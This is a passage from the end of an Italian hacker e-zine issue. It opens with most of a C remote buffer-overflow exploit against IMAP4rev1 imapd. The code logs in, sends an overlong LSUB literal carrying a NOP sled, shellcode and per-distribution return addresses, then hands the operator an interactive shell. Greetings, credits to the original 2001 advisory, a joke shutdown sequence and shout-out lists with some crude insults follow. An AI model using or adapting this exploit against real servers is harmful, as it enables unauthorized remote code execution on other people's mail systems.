				fprintf(stderr, "Connection terminated!\n");
				close(sock);
				exit(-1);
			} else {
				buffer[i] = 0x00;
				if(check) {
					if (!(strstr(buffer, "uid"))) {
						fprintf(stderr, "Exploit failed\n");
						exit(-1);
					} else {
						fprintf(stderr, "Exploit Success!!\n");
						check = 0;
					} 
				}

				puts(buffer);
			}
		}

		if (FD_ISSET(fileno(stdin), &rset)) {
			if ( check ) write(sock, "id\n", 3);
				
			if ((i = read(fileno(stdin), buffer, 
					sizeof(buffer))) > 0) {
				buffer[i] = 0x00;
				write(sock, buffer, i);
			}
		}
	}
}
				
				
int main(int argc, char **argv) {
	char buffer[SIZE], sockbuffer[2048];
	char *login, *password;
	long retaddr; 
	struct sockaddr_in sin;
	struct hostent *hePtr;
	int sock, i;	

	fprintf(stderr, "\nRemote exploit for IMAP4rev1 v12.261, v12.264 and 2000.284\n"
		"Developed by SkyLaZarT - www.BufferOverflow.org\n\n");

	if ( argc < 5 ) {
		fprintf(stderr, "%s <host> <login> <password> <type> [offset]\n", argv[0]);
		fprintf(stderr, "\ttype: [0]\tSlackware 7.0 with IMAP4rev1 v12.261\n"
				"\ttype: [1]\tSlackware 7.1 with IMAP4rev1 v12.264\n"
				"\ttype: [2]\tRedHat 6.2 ZooT with IMAP4rev1 v12.264\n"
				"\ttype: [3]\tSlackware 7.0 with IMAP4rev1 2000.284\n\n");


		exit(-1);
	}

	login = argv[2];
	password = argv[3];

	switch(atoi(argv[4])) {
		case 0: retaddr = RET12261; break;
		case 1: retaddr = RET12264; break;
		case 2: retaddr = RET12264ZOOT; break;
		case 3: retaddr = RET2000_284; break;
		default: 
			fprintf(stderr, "invalid type.. assuming default " 
				"type 0\n");
			retaddr = RET12261; break;
			
	}

	if ( argc == 6 ) 
		retaddr += atoi(argv[5]);

	signal(SIGALRM, processSignal);	

	fprintf(stderr, "Trying to exploit %s...\n", argv[1]);

	fprintf(stderr, "Using return address 0x%08lx. Shellcode size: %i bytes\n\n", retaddr, strlen(shellcode));


	alarm(TIMEOUT);
	hePtr = gethostbyname(argv[1]);
	if (!hePtr) {
		fprintf(stderr, "Unknow hostname : %s\n", strerror(errno));
		exit(-1);
	}
	alarm(0);

	sock = socket(AF_INET, SOCK_STREAM, 0);
	if ( sock < 0 ) {
		perror("socket()");
		exit(-1);
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);
	memcpy(&sin.sin_addr, hePtr->h_addr, hePtr->h_length);
	bzero(&(sin.sin_zero), 8);

	fprintf(stderr, "Connecting... "); 
	alarm(TIMEOUT);
	if ( connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0 ) {
		fprintf(stderr, "failed to %s:143\n", argv[1]);
		exit(-1);
	}
	alarm(0);	
	
	fprintf(stderr, "OK\n");

	
        for ( i = 0; i <= SIZE; i += 4 )
                *(long *)&buffer[i] = retaddr;

        for ( i = 0; i < ( SIZE - strlen(shellcode) - 100); i++ )
                *(buffer+i) = NOP;

        memcpy(buffer + i, shellcode, strlen(shellcode));

	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);	

	fprintf(stderr, "Trying to loging ... ");

	sprintf(sockbuffer, "1 LOGIN %s %s\n", login, password);
	write(sock, sockbuffer, strlen(sockbuffer));
	
	INIT(sockbuffer);
	READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if (!(strstr(sockbuffer, "OK LOGIN completed"))) {
		fprintf(stderr, "Login failed!!\n");
		close(sock);
		exit(-1);
	}

	fprintf(stderr, "OK\n");
	
	INIT(sockbuffer);
	sprintf(sockbuffer, "1 LSUB \"\" {1064}\r\n");
	write(sock, sockbuffer, strlen(sockbuffer));

        INIT(sockbuffer);
        READ(sock, sockbuffer);

	if(debug) fprintf(stderr, "debug %s", sockbuffer);
	
	if(!(strstr(sockbuffer, "Ready"))) {
		fprintf(stderr, "LSUB command failed\n");
		close(sock);
		exit(-1);
	}	

	fprintf(stderr, "Sending shellcode... ");	
	
	write(sock, buffer, 1064);
	write(sock, "\r\n", 2);

	fprintf(stderr, "OK\n");
	
	fprintf(stderr, "PRESS ENTER for exploit status!!\n\n");	

	openshell(sock, 1);	
							
	close(sock);

	return 0;
}
 


-------------------------------------------Exploit-----------------------------------------------







--------------------------------------------INFORMAZIONE-----------------------------------------
#include <stdio.h>
main(){
printf("Ho messo il sorgente originale\n");
printf("se qualcosa non vi funziona,non è di mia competenza\n");
}
--------------------------------------------INFORMAZIONE-----------------------------------------




  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cd  /Ringraziamenti_e_Saluti
bash# cat saluti.txt



Ringraziamenti: Ringrazio particolarmente Antonio Marcelo,autore e scrittore dell'exploit,da cui
                ho preso lo spunto per scrivere questo testo.

                Antonio Marcelo
                Security Specialist
                Bufferoverflow.org


                -- BufferOverflow.Org Security Advisory --
                -- Date: February/20/2001
                -- A stack overflow in imapd 




Saluti:   Bakunin(Mio grande maestro),AtlaWare,mR_bIs0n(Mio Fratellone),Spawn,BsTHaCk,Anubi,D4rkSt4r.
          Radion,Warning,Terror,Gouranga,Blender,Prodigy,Hiloz[83],Memorik,Hedo,MrWolf,Screen_it,zapotecz,
          Goony,Scire,Sulex,Floppino,Grungio,Fratak,McGiver,AntiS,gouranga,LizDay,satz,cancerman,Dea,ULCC,
          Ice'St0rm e tutti quelli che ho dimenticato di #phreak.it(scusatemi). Poi saluto anche tutti quelli dei
          tamkcommandos,della hrn,pbk,Maphias0ft,gli Spippolatori,in particolare il grande Master,Chrome,
          Brigante,RigorMortem,e tutti quelli che mi vogliono bene :)

Fuck to: MMMMM un gran vaffanculo all'amicizia fra ragazzi e ragazze!!!!!!


  -._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-


bash# cat end.c

#include <stdio.h>
main(){
printf("Anche per oggi è tutto dal vostro SPYRO\n");
printf("Ciaoooooooooooo\n");
}


bash# halt

ATTENDERE:ARRESTO DEL SISTEMA IN CORSO......

ORA SI PUO' SPEGNERE IL COMPUTER!

ahahaha scherzo ;)










/===========================::=============================::=================/
/  /Outro /                                                  A[v]a[t]A[r]     /
/===========================::=============================::=================/


Ragazzi anche questo numero di Dn è finito ed ora non mi resta altro che salutarvi. 
Poi cerchero' di fare qualche altra cosa, molto difficile visto chè fuori piove e molti dei miei 
amici sono partiti per trascorrere le tante attese feste pasquali.
Ringrazio syn che ha collaborato con me e tutti quelli che hanno letto Dirtynet
fino in fondo.
Non vi preoccupate per me sicuramente trovero' qualcosa da fare anzi lo sapete cosa vi dico 
ora mi vado a preparare un bel cubalibre e poi inizio a fare i rosari su Marilyn Manson!!!
Questa non la ho detta io e stato syn......     

         




Ringraziamenti e saluti


Method man (frato di sYn)
Avatar
Giada
Carminuccio
Gollo
Scafuto
Scafuti Chip
sKAM
smav
Immacolata
Nicoli'
Marilyn Manson
Papa Roach
all mumy
Angelocattivo
#buonavolonta
Linux
Armando
Costantino
Gigi D'Ag
Gennaro
Cherubbino
Capucchion
Pecuron (Agnello)
Gei rasc' (Jrash)
Leo il colombiano
Zi' Pepp
Capa Rezza !
Carletto
Cristiano & l'animale
Winning eleven !
Dj time
Claudia Shiffer !
Frezzolino o  bread
camelot
Tank commandos crew
Fons' a patan'
Perrotta prrrrrr
Ivan il terribile !
Maradona
Il berretto di Armando
Il gsm di ava con sopra il logo di Hackersat.com !
Norma
Vittoria la zoccola
Nigeria
Pinturicchio
Babangida !
MinM
Salernitana
Il Cosentino
Pantuliano la stronza
fontanella
syn's guitar
Nello
Rutelli
Di Biase
Scevcenko
Batistuta
SPYRO
Spencer
Bove prof.ssa di syn !
pagnotta
Blinky
NCKxxx




Chiunque voglia collaborare , puo' sempre inviare i propi art a "syn@hackersat.com";
è chiaro saranno valutati prima. CMQ siete tutti ben accetti.



Chi non ama troppo, non ama abbastanza.